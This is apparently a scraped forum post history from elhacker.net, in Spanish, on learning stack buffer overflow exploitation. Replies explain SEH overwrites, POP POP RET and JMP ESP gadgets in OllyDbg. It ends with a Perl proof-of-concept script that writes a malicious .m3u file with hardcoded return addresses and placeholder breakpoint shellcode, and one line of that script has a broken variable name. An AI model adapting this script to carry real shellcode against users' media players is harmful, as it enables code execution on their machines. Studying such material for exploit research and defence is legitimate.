Entonces el exploit está formado por el payload (método(s) de explotación) + shellcode (programa que se ejecutará remotamente).
Ok, muchas gracias
.
Ok, muchas gracias
![;) ;)](https://forum.elhacker.net/Smileys/navidad/wink.gif)
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCita de: MCKSys Argentina en 3 Abril 2014, 23:13 PM
El que tiene el problema de busqueda con analisis es Olly 1.10. Si usas Olly 2 no deberias tenerlo.
De cualquier forma, si en Olly no encuentras los opcodes del comando, es probable que no esten y que findjmp falle.
Recuerda que puedes buscar alternativas a un JMP ESP, como por ej.: PUSH ESP-RET, CALL ESP, MOV R32, ESP-CALL/JMP R32, etc. etc
Saludos!
PD: El EXE no tiene ASLR, no?
Cita de: MCKSys Argentina en 3 Abril 2014, 22:26 PM
No. Olly tiene un problema cuando busca opcodes, si el modulo ha sido analizado.
Para verificarlko, quitale el analisis al modulo y veras que encuentra los comandos que encontro findjmp.
Saludos!
Cita de: .:UND3R:. en 3 Abril 2014, 16:27 PM
Si se cuela un byte adicional es por que en el buffer no se está almacenando correctamente o hay bytes no permitidos, por lo cual deberías codificar tu shellcode o desplazarla, saludos.
Cita de: .:UND3R:. en 3 Abril 2014, 01:52 AM
No entiendo muy bien tu duda. Bueno en cuanto a POP POP RET, es utilizado cuando la excepción es manejada por un manejador de excepciones, en tal caso la idea consiste en sobre-escribir la estructura SEH la cual está compuesta por dos parámetros DWORD, para ello:
- EIP debe apuntar al manejador de excepciones actuales (SEH) el cual debe contener una dirección POP POP RET.
- NSEH primer parámetro de la estructura SEH debe apuntar a un salto que se encargue de saltar la dirección POP POP RET
SEH - > JMP SHELLCODE
NSEH -> POP POP RETN
SHELLCODE
Recuerda que puedes ver en OllyDbg la estructura SEH actual, por lo cual desde ella debes obtener el desplazamiento adecuado para controlar tal estructura, saludos.
# Generated file: C:\Documents and Settings\Adminitrador\Escritorio\pop-ret.m3u
# Technique used: POP + POP + RET + JMP ESP
my $file= "pop-ret.m3u";
my $junk= "A" x 26061;
my $eip = pack('V',0x01BD1111); # "pop pop ret" from MSRMCcodec02.dll
my $jmpesp = pack('V',0x7E41A323); # "jmp esp" from user32.dll
my $prependesp = "XXXX"; # add 4 bytes so ESP points at beginning of shellcode bytes
my $shellcode = "\x90" x 8; #add more bytes
$shellcode = $shellcode . $jmpesp; #address to return via pop pop ret ( = jmp esp)
# Shellcode = 32 breakpoints
$shellcode = shellcode .
"\xcc" x (4*8); # 32 bytes
open($FILE,">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "Archivo m3u creado con exito.\n";